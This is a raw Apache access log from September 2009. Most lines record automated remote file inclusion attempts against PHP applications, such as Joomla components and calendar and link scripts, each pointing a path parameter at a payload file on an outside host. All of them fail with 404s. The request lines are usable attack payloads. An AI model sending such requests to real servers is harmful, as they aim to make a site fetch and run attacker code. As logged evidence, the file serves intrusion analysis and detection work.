122.155.5.84 - - [23/Sep/2009:06:20:25 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.142.121.41 - - [23/Sep/2009:06:20:32 -0400] "GET /agendax/addevent.inc.php?agendax_path=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 222 "-" "-"
219.142.121.41 - - [23/Sep/2009:06:20:32 -0400] "GET /logs/access_log.Q109061000%20/agendax/addevent.inc.php?agendax_path=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 250 "-" "-"
219.142.121.41 - - [23/Sep/2009:06:20:32 -0400] "GET /logs/agendax/addevent.inc.php?agendax_path=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 227 "-" "-"
61.100.5.136 - - [23/Sep/2009:06:20:49 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:20:49 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:20:49 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:06:20:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:20:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:20:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.100.5.136 - - [23/Sep/2009:06:21:47 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:21:55 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.250 - - [23/Sep/2009:06:22:25 -0400] "GET /logs/error_log.Q108112400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
63.249.159.4 - - [23/Sep/2009:06:23:02 -0400] "GET /logs/error_log.Q109050600%20//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 257 "-" "-"
63.249.159.4 - - [23/Sep/2009:06:23:02 -0400] "GET //allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 230 "-" "-"
